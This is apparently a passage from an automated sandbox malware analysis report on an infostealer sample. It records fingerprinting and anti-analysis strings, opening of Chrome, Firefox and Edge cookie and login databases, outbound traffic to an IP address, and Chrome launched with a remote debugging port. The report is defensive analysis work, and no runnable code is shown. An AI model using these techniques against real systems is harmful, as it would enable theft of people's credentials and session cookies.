Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_001613C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 7_2_001613C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6684D0 cpuid 7_2_6C6684D0
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 7.2.service123.exe.6c5e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 3496, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.6:49714 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs